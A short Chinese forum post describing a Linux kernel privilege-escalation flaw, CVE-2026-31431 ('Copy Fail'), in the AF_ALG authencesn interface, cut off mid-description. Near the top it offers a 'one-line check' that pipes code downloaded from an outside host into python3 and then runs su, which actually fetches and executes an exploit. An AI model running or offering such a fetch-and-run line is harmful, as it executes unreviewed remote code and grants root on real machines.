jam1024 (@geekjam) 在 核弹级Linux提权漏洞 中发帖
一句话检测验证 (不废话版)
curl https://copy.fail/exp | python3 && su
效果:
[image]
CVE-2026-31431 (绰号 “Copy Fail” )
漏洞详情
类型:本地权限提升(Local Privilege Escalation,LPE),允许普通用户(unprivileged local user)直接获得 root 权限。
影响范围:几乎所有主流 Linux 发行版(Ubuntu、RHEL、Debian、SUSE、Amazon Linux 等)从 2017 年以来 发布的内核版本。
成因:Linux 内核中 AF_ALG 加密接口(具体是 authencesn 加密模板)的逻辑错误(straight-line logic bug),源于 2017 年的一次“原地优化”(in-place optimization)。该...